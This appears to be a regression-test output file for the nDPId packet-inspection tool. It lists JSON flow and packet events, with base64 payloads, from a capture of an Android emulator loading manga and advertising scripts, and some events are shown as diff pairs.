yy72PPJtIlsYrtAH9bCJYq3LGr5bJa5FL9WoN5SHSDf5jplRLR7+rgEiYOlVGV+4kVYfD5SFI2S\/HExsMx7VtJB2Omkvqc2Q6QLTH57xbdDUiO3IBJl3MyR\/eNI4Cwy+BsqRM6iYE1LEawKBCLPmkUhGpciWRNIQqr+z8Uk9+Sg48Y7EZNUpinWgEk1kZtgH7W+srAQhE5yRQhEZ7o+Q7gz3wLLaGa\/Bpb78CVwvJTI8ZumtGhSe5YsIxwzT9jVq\/EnwFMZpzHxwiu3H8m6iX1EGp1RgRl5cGXIkcZnakmeJLhWzXwVzWhmPZ8lBY5rkQx471MkAB2ekUCsgzkyiLsyGvG4oufJIR6RJwnR91myiPEtkkbc\/xR5YDvOyEPefnnbJNOfkYzck7NxmXHNfjzPlCEzLE9GMsBnCUoeuHD\/ZIDyRTZd5idkrDqvHMdhgJSC27+jjz4teAnJYdLvtvDVAVxKUb3Q7zbJRaPGNIqp3b\/ahXcGuHsEclt2Xalt1VYra9Xa1tZ2pbIBD+pjvzsa1imLqIvavrpyUzO2FcRoMbg5HrMfnArpy1P6panvkYiC79tIPVkbniyVcJEx\/RDq\/Q+haec7kyFzJqEpcv\/uHfJyGB9HFaZsfNZDDbXGh9CAkXNteiAXFG4kLsseXGSjj2w6K93xnKiMX5I7Py2H9jW+AFUaIGaho8ppJV81x0mNcZY+hMCFUoc\/+y\/qLnGNmk8AAA0KMA0KDQo="} -00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385140836,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3231,"flow_avg_l4_payload_len":1077,"midstream":1,"thread_ts_msec":1654385141022,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385140836,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3231,"flow_avg_l4_payload_len":1077,"midstream":1,"thread_ts_msec":1654385141022,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 04379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1654385141023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385141023,"pkt":"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\/TYlbOty8Gs0bRV1H\/ypf1rm4641Ev70yKwSgb9e5s3mz7TzN9OhxMJq0itNApOtXvss2D+6x\/Z6N6caNu8v6ncT4qPnU\/ZcfTwfDj\/zkv8un2mrJ+GH5r3BkwmWLW0veLzrwz7G90Jv3DD9vDH8fdSZaflmfbw3v32vP++HD4oVMczj\/cvTvpThfzs+5gOp1ctiZWyLh41d\/YVmOLxjhv0LAanfYHh4sP2\/NP43J41iovp1lx0pi2r4aDedYsjv+WDctmL6NKNajSfZn3y+58Mh5mrc12Z9YvDzc+hGWK4y9ZnXH7KjucffDDKc\/G886hlbOSRT4caIvaNzetaXv7eJYNPm5b16EJ3\/nUvxtlJ4PFpHQjyg6nH25uNKP87t3cFmt7ElalPenOz8YnZavtNixfTCadsr0NMAwYagUMGyxLp2xttG8MGGZ9tr\/oX230NuK2l92smn7WcSC10e\/3i8MstpSv9HNRjEeNjTu+muraxjDf7Wwyz65U0geifL+jYrg4z\/Kye5qVe5NMP+c\/XR4MTl8PzrNW8ywbjJptht4Z92PV
IStWZr52qzkfzsbTssksu9rKfrPMPpcP\/ja4GPg3nXF3eDaYzbOy31yUJ\/e\/b1IymF\/mQ8HruDufDdnW6b1m8152r9k9XuSjSdb927zZmWkDs3y0ezaejFpjdqxTds\/7Gf8O+zP+nfabTbeOrbB5dhQ99JYCuqzN8r8xqOpOZ0VZaJTds8H8zaf87ayYZrPy0i0j7bbbdajMDssPHjBDB81eAjIVtJZfhVbaYiVXAZZuO0X7yibL4XHQaoVL0GqDWQFKOs4O9erDTcAYN63DMNqWGgJ48tZWu5O3Njd+0J+H+uc7SrKAUvp56\/HDrfZNp7P8ZXMxzxrzcjbmVG6n9b97SPUv1g4vGzPtShjd3btZ9+gom78qRotJtpP1rpr+iHHwbm7K5KUApOyCJ87eFYsy48R3zwcgjbeD8ozf+4ZB9KMclONhrFP\/wft32Wg8A63wky0\/n+rHq+y8mF36qu7YeMyct548fNQG5Getot0ZsDRPHj5udxY8D9qduT0\/aYMXZ615G9TI2j4GH015nrQ7Jzxvam1HPJ+0O2dW\/7t254Lns3bn3J6\/b3cueT5vd06tPjtyzPNpu3Nk79mmXZ6P2ttLIx13\/WKxMH4ui6QoznSYFmrx+tPlkll\/lBTV1vAifeFW+TIpqjbhOClN9mk3FH8NoFIQEaR2Zh0uoA73jt2hRYvr7Q7Ao3tjKETqdgo8WLaH\/Tz71NibzTjuzVfjfHwyzkaN7PMwm+pSbhTD4WI2y0bbDYFweZY18iK\/fx4qjrKLRpZfjGdFLrzXAKlbpROwdiNTq43zbD4fnGaNQT5qDEajsZodTBpn2WRKrcanwSwf56fzLtjPsKtGyVWZzOIDYLGxnY607M6y6WTAHfbg\/5g\/OK1OUDwhk8PpvXsfbtqAWDcHD\/ebL3JaHg8Y5C\/jYgKsF3nzpjybFZ8aw+7JjDrzg+JtMe1vdoY3dvEXyeXRvrpJDu6MLfnKKdc0ZoDhow3u8P4s+bion\/j2VQ07xM10BFHAwv3B7NRumbm\/KO9vdvJ+tWPvssGw9Cv+B7sEthsX4\/m4bJyV5bT34MEJq3VcFB+7p2CCxXF3XDzgDhqWD7iT5g9sq+6PsmExymbds\/J8sjMO69WnOQiFje3Zj+X2DKIlv9dv3mU888MPepfro\/fvXuyCFIocKGjFsR7O7m1+aG\/rgzpoBKAAPr4ZriqYmn8dmAIaisDN5e02u\/gCPED51SGhuEmwtTY9bI\/uhC\/uHMdMpAuHLLu+jgcua7tB6NAdcIf6g+ev1sF8Pj7NG8NBnhdl4zjj12TCcRRSaKi1htYrB3mN8wyiItBt7nPuh5swPG6L9lU5uxQNfafWuieg7mzaCmV2\/Pe5mfLTVnNwPBQNctLKDh+ztaOs2Wk+bjIF3wIETnLhi7yZ02lFldFoIHpLkWM5QJP\/uMk\/QE152Dxq3nNdscrF+S4EzS6gA131oZ\/bcGZf6qlsc3FNa0SKvw5LCLIbG3hzY3Pr4aPHT777\/ocmBNys+7dinLeazXZ92tCJgUjUpFnQ07Px3z5OzvNi+vfZvGx259PJuNSHXWa0N4DGDkura9gowOym3Vn\/dbViH7PLeSCc3O62RKa223FgN1DStA617SYD1+KRz9pF3788Py4mcy5W\/\/o2cow7d6UGdY1UezHfy0Ems8HxJEsQEzCz479xY+1Vcxa0h72d6WoBtWW6vzdhaeJ5D0S8WJursJkJOhiCDEIrExGWszaErfiyWWfSvnu3NT+cfICrm1APMISiW\/SL1qz6SBfB9MdF6Acc3x6EBhawFa4N\/VIz9heK14PJHNp36QiLrFuPfiG3NGf\/6abOcTcHWnVqRX1xFp6WnJtjyAJIEt77U1S2r6+\/X6muT38ZTBYZb5oNw7z3ReT3Gs175b1mo\/mtH2VQXpfxq+rAF4LLsLbldslwj2bQ\/RmXd8TM2+2sDw53\/
HRWfTx2k9WdlbPgGSi7e3RWzMvXDLtfdsrDc45oVX+gzlTbugkVt0t2cJRNshJKgS+gjKtGhL4S\/LRwPQo9tah2Mhmczu9eiKXY5bAxZLEr6n3eDmxrOiG9ZXYAedk9GXNirf521gsrYLxyLrYlX+JTWgvfIiAMfwwIF5Cg3aNRcf7imaBOnN\/QreW2Rs3jYHvQH3Rz9mt\/fDwBV6phKNnOkLbGrTns\/jZMcTnOF1kju5m2mg+3mry84fpwc7vur50cbLAXfzSESoWuM1bOY6uGfscDU0p+cMeKrCKsG+ICvoK4604HLIdtV\/hWQ9\/OAIPqlfHctskdCBI2awbbQ29Uo7Fi2mq3c+MJnYTi7t0F5xJg8ACTAMCwAgCNO9aw5QIMYEACVOgo7JQ9Daea7MRPtroYqw92tHwPm+2ee5lCUZhbAljLy1O1s92uVsh\/8NZWacc13FM\/j5owcDorGq57bS3CMngxTbU2gtmk5zjrpMxQ91TcCGSfuJjv+Dvi7xaMIWxMCxaRF90Xz46eHhy8e\/HT+4O9o9dPX+2JtRnB1zSPOLWQZS9yWDXo5Bf5vBzkw+xfmvdewbB1Z5DRxTnCkbLw+Obhk7aX59DDZf8KxLQ7KebZnDbct8+5bHWUevMOL1dKhyrVe9ULb3uTzhRuT2exOoq9RSy09sYdgFdV7GmQUsiXS0zL"} 04370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1654385141023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385141023,"pkt":"nLbQ0+MztKXvZygQCABFAAt0wQFAADQGCMqhdQ0dwKgCfgBQsWi9CeORUtBIV4AQAOt9HwAAAQEICpcRGLW6xhaMEpp1mOZOq1lRM3AjoFakWE6ydn19x4vYgtBktaRbE6NImoX8K38\/z569eYUc0P3+tZh9zGbzXtLVndCVe+cr7l1wgl6O52WWqz6yqTutMAYYl9pr3vnRDcqSFbCXXIfW+y\/j7JOklNZEqIcgJwNhjecvctdr706eLphjKXQ\/hf8CZhCmXLmntICwF3bGo\/zhapQdL04PimLSm7m77tvpVX\/GY6fx6kOc4DpLXkE8dcuzQfnObhIQKWKm5Pn5ADEZQH9HEsb0xcGMC5ByDkWt\/DXzoFzTWXpzgNyxn\/TshykBz029jaeeQapqg0999ewmkdKw0rHBdUsbXhoN\/Qa5B8fxHZxRPhxPsgMO4JwCuMe7d\/cCJpm0mtCdzeR+K0R\/M0gYVXjlcjyYjP8z\/bjV7thrZCrlZbyf5y9NNGz76t6LODpG6Px\/LTKW7kRkx1v2NxuFBjikKyPrf2HUSQtsQ4WRjQRAdoDgV8Jrv3CQhJ297rFI1Gz0fjpCaAm+NyGDq1g1MHA3eljx7tF5scjLNzMokPtcB9VT9QkItSIj1q7Edsnte+pR8Y4t8yOklZ1QFC+J0+6cEyfZ0vG9e\/FOcAxIafyH0Suz\/imCWzHk3SNJRbnKd\/0Kz4HplTJ3wgT\/Y5EGZygJOF\/Tl9lFNnln1BUyFr1GsKXvTViSBzGwCXO747mBUPjs15kEsjNuX75ZQ6NJaNa0LxoLW3ARewttm8mTQTJFPgcCuuUY8TICXcZ10aVFSJ9zt0UvTl5nQ4ldZpe6wIHBVRjpHNPR3btpY3u5BMRwJ4GIm
kNtz39EM+IUFnOo7cyo7QiR3Sz\/uyCzJTUF51HguYBCGoZ7BJJimcapgdZ4\/pOAi33w0LXTOo10je5pz0Vzx7rVsOqvF+fHtoTrivvH9zbbbQ8ZK8A7h6CpIBA6RlT+ZWuPbVoaScftgh8X0vbBtNfYHeR\/RM7iZo0YoqFi49O1JqagabCmIu0bn84gvt2okVjMJDoTV89cG\/5EIfTqHMU11FCQWN7ZMIQrhCgqwqgJRJuiJrYeenLiCX8lFN2SUPWCH9+BaiUV3dw0KsDIjFMIRiSiG4hD64iDPjY7ew7LfOpfVQiqYvg89lp7KOOBvOkMRWl821fpQWaPxWAjv0M2LSy5tp925wDw6YWz3t\/gTvv8xeHWsCVgj76khYB9\/Sjrldmb8cnlU1hRqUje9g8\/dT5\/2J6iMIwcdue8I+oquQL8WZ6nK+DB++1NB+alnC2GZTFL398+X7chJ4x7kqHGMy1G\/bj5S6M2cvfVlzB+rb11uMA3u+6VtX7T8eilmoe\/OP1kzwP+cby4puj2dV2Toe7tNTqu9RsELKMupJduPE7NQYFEYFvY9qAfLmmuWWGr7QAk19e728YdhQKHnrN+kVx8MDxhEK1FR1QHSAHZX1goMARIdbd9pYNiHZb9o+3lU1QiD4gwA00fvi4BoJvORwGq1LDv1iDfZB3RstaoiCeghC9sZh9SxrUbsBVsALfy6eUX2vyONpthxZCLeUI7W7rY3f36fcV5NREYA4p5+skKmnRf\/VB9tccYbzpv+le3Uk7GDHY8DvT4tTfueKzqCmBWTibwtzbNSHv0Dvzsob96HzuGk4cpGf1mWUi7QjmHdZBCzWlLIq6bT3UX7Rb5yfhUGlJhpqMS6ZbjmiQIUVGO8uAiM5Lfyy2Lvr3QZepPfNcYOAndIzEy1u1QSHJQLIskxl4kgbTrcPxhe7Gj5vjVXyAc7TXdECSIHdubrivoz3qhXk5luzWgxQHnO\/08KI\/ezqBVuI9GO6tFvRyglW1FkEwB7f5Ez11H4\/kzp7mPzSAHSSh9EfQ2CK7PL9c0nsCt33iO0m06ODUdzH5ZQA6N6s1WlW1ShS42rsAxf3XzSZ0ovcpC\/DRavgq2IxNJD58vO4fN0TjdVOTZyX7ylGwlT6tzsMLV0aqd0HLkGNPCQP7Mmx+k7bzSiXNQ77bO\/fbU4oFBWK+2sOKIOrZzb5GJ+W+PF8dIbGFN9RJec5hNJML1DUMOon88n9YQgd9ORy3a6+vrZ+ALcNcnXY2IvmWYEbfXtTWes7EwwljT0NXNNjLY5Bq8QjIgmPIbXvUXDtJSm1A0hkSRpCwdHxNCgYtr7e0sF7Q4Aov8IyOuYaIEdCGmReVWoCzO0zpb3dI6pAmAWYY5UJhsczol3Te3jnzpO4a+VHLL2N3m\/WT7aYNPC1ivOPpkUGtPih8\/9\/McyUU6bj\/9t+4N27U6ca6SefW+DoDuCK4nYZIl+TLK88YjhqWwsRAwRXToeLMoyjcVkbDeAgbNVdX9P6sQaX\/O02BxKkXz7gQNRUUEgKuDlFh9IQgKWB76QMKKaTBaATHG3waU4BJ0cTNAfACnFN\/JrCM+9GuvZP4U0Dy3RJaMsJB2J68KRNBn9THntUdZ8aT0TUbBSbGYBWGG8fozAHSpHhr+dfXozBvD9ZekHGvlb1ceAflTXn2cm6IkCKL4e\/jk8fedTWyY4ro6Eq2uPBFcLC191WYQcKUtLI1qyWwFGSyL8xL7KYi\/fXb8rNrWKNtpPtC9CFuKNvGpzMEwhqHsHnQSdm4oaGDWf28D3fnimE8xkMOYJjQDijwZf05GIJjz6FU2ZVkXK8Hs85sTzC2EB1wTQYyctgQDMRY9+41Tyjz\/fX\/T2vVsE09ucIj355kZ81QrG6Uq19eshQwFMATTPxAqcZjNP6DsLWDL7m+aKoDlcmPGYEfGPf4Jc8i2o7rH6cc7lfp5HNow00LXBnKEWhtQOBQ4AwN
sBWSScgW1dSbbjF7ZmWeD2fCs19zRZuY7zSbiW+49Sv6gkplKJNLEaG0my7nb5ouyw7XJnNkDa5WZm63aGbOPxgqt0pYmyvCR5tE5E+FHq8BewY0kAatco7uXg5Ko+gfTLvuqbohJ1ZmGfW8GS8GQq125VYxbr4L5jsnWOgtjZILlzlwCqKgvKTEd\/We03Bk6yx0\/gQ9YdiFCSkb6dcud4eHEW+6I0v6K5c58yV4DFW+q0P7K6od1d7Z1LO95PDim6zUgQjhlukYtf+6PYpSQObOYUGzWMVgfdnIMZ42vdDZNZrtxR1Aow5opFdzPtiFevZC86O7dkb3R71Rohj5WqIb7KOr4oHXM\/MlUMy0xoiMuIkCTc3UTZ+W1uudgozAJJ1orQR32Tc021DWTfO8luvpeA++XaMzcd4yn6sarclVNQ6faaF21OVexR5dGmmjMNgiJNavWTLPo6l2pSi\/rhMH3EGdpII5GVV\/+V7EPns9Pe+y+riCTnD1GMGais81H3p7wCRyEqeIeYTh4hpnXRX9zUyq3SgcVWeOgc+KoYymBrBEs5Lnm8KobfmCDiYnPulbywcUYLqcQxtBVlJ9WzcR3XQygZk9PIWru3n3w2\/He6DT77cFvowcs5hwb69BEVU1avpPEHMWhFbd7tqAHMBsgzYvr69XCM4ZSOPNwqiTvtQsoFV8Wn7LZrqRPMqUQwVbVogbM1FC2XlXTSSENTgxS2jsox430GedMrvwpQ0aDPMvBKWbjPQBk\/SsD4TbGPENf4QC1mfu+f4ktXwr4v2IWpdf9ghcmhrbz0B+Hx58PXr2EdvMvDwSci4REGv4O9FBd9q3sbilzj7JiTSHXx161e\/Xq\/f7B0fv9vaO379683Xt38JfeZufnp\/tHP71583Lv6eujX56+fL\/Xe2Rlr9+\/2sNuzpd9b2Vv3+y\/OHjxC1rh2sst98WbX\/bevXzz9Nnes6UGH255wQiqz7fezMcJMiqeICpbxobYfLVxNr++hmwdgIb4OBq1CCBsu93r+brX9uHQvQm92nf2YuJevFrIsrjIX2XlWTGy1sDR"} 
02796{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1787,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1787,"pkt_l4_len":1753,"thread_ts_msec":1654385141035,"pkt":"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\/jNhC+769g1AUsJbaUpOjFiRZIt9giBdotmiA9eFOAlmiLsUwKIh3Hzfq\/d8ghKTm2i24vEkHOfPN+rLko5Tq9L2hJchLPVqLQXIo4Ia\/vCHmmLaklLe+4Zh+lmPF5S80zkAbKBdsMSUHrekqLBbIh46qtgS6qtG7GWaZBQrpmpaylXKSFXGa04ZkCYBVdgSjkKammwPQKoGMCny0+vU\/pE32JAXFo9TLkhnRMfrn7\/FuqdMvFnM82sblMhhaOkCXTlSzHZPD757v7gb9tWlkwpX6y7DNaK+ZfCik0E\/p+0zBgok1T88Kamz0pKQYWdZukpRSsc1TLVCOFYt5yEnwRhyc0YpuYv7XI+\/VHKgRrHxjEoFV7Tl3zUldDUjE+r\/S+jw8FJrbRCLEBiyBmKwxapyGfxSc7T+TrV7J7kz47pY6+pFOrfEJaplet6MyePFpDTYyMnR4oJzsivQAHgy7a4fjEa81aZvJy8ujfZ7KNDSqH2\/Mr+F17AWnNxFxXcHd21pnaRwQWp8yEB0AkWFJdVMyEAClS8GNqL+Psr\/hLeZZ8ObW\/cZyeJlkwkBDwpWPuC7X3Nn7kJCcNbRW7FdpTTi4ek8S4Q3OxYt404zBAw3AfZLs8xtYpDRY4dSbf92wEK208U9QpJ\/bfl+zenfTcZd0+hfJhSZuVqmJk6\/lj64rP\/99mBzIEFMf5pjZaKsobUf7BlvKZ3TxY1cGykNcOxHscvOZuXBKQHLIjZKZY1TUacpDwIhA6kMm581yXviEx1M6jlprWf9r6BIpzFPKtKdoHOfMJqCBFoV2aykdU9KfRCG9B3q9UV+kM+mkb26PxmlxC6z4lPUzn4W\/VykkZHVUIUxxtv7bufnWh98nWc9pOvWFnSZXpryzmQ3LRy59py+gCTYZmiT3Xfl0iYYwMwdZ8jENMI\/xZynnNsJ\/emJYRcoXVbAld\/baEDlpzOA2JqiV8bQn49upT6X08+G5AzkjgStJKL+t4cM2FAgCqVB7RUk03cysxIkBt9SNkoPSmZnlUcjCNbsZc1Fyw0bSWxeLKShsbaHuC\/6B5ucJys9eu8uz9DqqZaSNajlD7PDIYeDYgB0mNgUhoTntkJPswcC6HitAw7+SM9Iwy5ROtRMlmoH8Zed8QAt6ZynIzSFKYjhBGcIsqWt5oQtVGFES1RR5lWUPnjJaXKboIXko3SO3cx1eYqVlPZPqkog\/XGaIF7TC+HMZy+0zrWxPXrpghAfsPimlosZawm86d6jZdD5gK7fmgqaYbFzWjbQDtpPXSlZC4ZwXot8aFqn8JIxRmIvbLV+x0Bt2nN\/yH5Ifzc4e6hdxTLKw5\/xPeVM5OgXyEYlt8km3BjpbH37DY3JbeZf+pEiAPiwW0lgLirSLiU9UgYf4hps1ACC\/UUIjtAfzDSWWClkeavejsiT5TTJHI51pRCtjIVlOocvqSCgZECuRwfSijgkfcvhuahF2bQs0f6Q264sosBhBl+GKPsndY0TtD1d4fHKb2JYgCrHAOTc1ol8KeCl0cbE9NfwO6oKy
PkLnHjveALTX2Gg5Jp5c7oy7DDsUNOw9GyLriNYt1u+rtsliASAoqHJrLfvT2igKaygnyJGSnn9sixBe3\/0GryWHXLpdyOuhUMcVhOrtbZUCyY9pZywo6albTkdnOhnY56+9lVtSJAzi8bO3PDXRgCMjQKwALW3e+hPMR9\/Z8QN5a7uo6rCA7Dujq6I0XjI790t3TsHPMvwp3I8oN1HQKXcpCJZbL1oUbsCb5rt5tkxhe\/gG\/wmXsHg4AAA0KMA0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":492,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":492,"pkt_l4_len":458,"thread_ts_msec":1654385141046,"pkt":"tKXvZygQnLbQ0+MzCABFAAHeDJVAAEAGB\/rAqAJ+EkBPJaGuAFABgVk3JTRLIoAYAfYmXAAAAQEICqYAsEjS\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"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"google.open-js.com","url":"google.open-js.com\/doubleclick\/ca0ecde2.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"google.open-js.com","url":"google.open-js.com\/doubleclick\/ca0ecde2.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
01078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1654385141075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":520,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":520,"pkt_l4_len":486,"thread_ts_msec":1654385141075,"pkt":"nLbQ0+MztKXvZygQCABFAAH68DMAAPgGrD4SQE8lwKgCfgBQoa4lNEsiAYFa4YAYAIOtmwAAAQEICtL8K4OmALBISFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2phdmFzY3JpcHQNCkNvbnRlbnQtTGVuZ3RoOiAxNDcxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDA2OjE4OjEzIEdNVA0KTGFzdC1Nb2RpZmllZDogU3VuLCAyNyBTZXAgMjAyMCAwOTo0ODo1MSBHTVQNCkVUYWc6ICJmZGI1MmNiYTkxNGQxMGI3NWI2YTY2ZmQ1NzVhZmFkMCINClNlcnZlcjogQW1hem9uUzMNClgtQ2FjaGU6IEhpdCBmcm9tIGNsb3VkZnJvbnQNClZpYTogMS4xIGI0ZTZhMTMwMWExMTQzOTM3MjMzNGFhMTRmYjdkMzEwLmNsb3VkZnJvbnQubmV0IChDbG91ZEZyb250KQ0KWC1BbXotQ2YtUG9wOiBUWEw1MC1QMg0KWC1BbXotQ2YtSWQ6IGM4c2hiWWJFVnhFWWhjaEN4c1d5LUVhTDNiYzl2V3g5aUl5clpkVFEyYjVfeXZneTlRdTBNUT09DQpBZ2U6IDYxNjQ5DQoNCg=="} 02378{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1654385141075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385141075,"pkt":"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\/aWQ9VUEtMTU0NzU3OTI5LTU3Jz48XC9zY3JpcHQ+Iik7ZG9jdW1lbnQud3JpdGVsbigiPHNjcmlwdD4iKTtkb2N1bWVudC53cml0ZWxuKCIgIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOyIpO2RvY3VtZW50LndyaXRlbG4oIiAgZnVuY3Rpb24gZ3RhZygpe2RhdGFMYXllci5wdXNoKGFyZ3VtZW50cyk7fSIpO2RvY3VtZW50LndyaXRlbG4oIiAgZ3RhZygnanMnLCBuZXcgRGF0ZSgpKTsiKTtkb2N1bWVudC53cml0ZWxuKCIiKTtkb2N1bWVudC53cml0ZWxuKCIgIGd0YWcoJ2NvbmZpZycsICdVQS0xNTQ3NTc5"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385142293,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"flow_min_l4_payload_len":517,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1654385142293,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.28.164.143","src_port":51888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1654385142293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1654385142293,"pkt":"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"} 